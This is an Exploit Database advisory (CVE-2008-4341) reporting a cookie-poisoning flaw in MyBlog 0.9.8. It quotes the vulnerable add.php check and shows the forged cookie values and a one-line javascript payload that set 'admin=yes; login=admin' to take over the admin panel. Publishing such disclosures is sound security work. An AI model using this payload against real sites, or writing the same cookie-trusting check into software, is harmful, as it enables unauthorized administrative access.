MyBlog <= 0.9.8 Insecure Cookie Handling Vulnerability

ID EDB-ID:6531
Type exploitdb
Reporter Pepelux
Modified 2008-09-22T00:00:00


MyBlog <= 0.9.8 Insecure Cookie Handling Vulnerability. CVE-2008-4341. Webapps exploit for php platform

MyBlog &lt;= 0.9.8: PHP and MySQL Blog/CMS software / Cookie poisioning

$ Program: MyBlog
$ File affected: all /admin/*.php files
$ Version: 0.9.8
$ Download:

Found by Pepelux &lt;pepelux[at];
eNYe-Sec -

MyBlog is an open source Blog/CMS project. It allows begginers to have a 
simple to use blog/cms and it will still please developers with feature 
packed system with plugins, themes and modules.

You can alter cookies to get admin privileges.

Code of add.php:

if(isset($_COOKIE['admin']) OR isset($_COOKIE['post'])) {
	$name = $_COOKIE['login']; 
else {
echo "Please Login";

If you try to enter http://blog/admin you obtain: 'Please Login' and the cookie
is some likes that:

login=Pepelux; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926

But if you change the cookie and put, for example:

admin=yes; login=admin; fontSize=80; PHPSESSID=913e40ece8c45da4e1ad5c6c44327926

Then you obtain complete access to the admin panel.

javascript:document.cookie = "admin=yes; login=admin";

# [2008-09-22]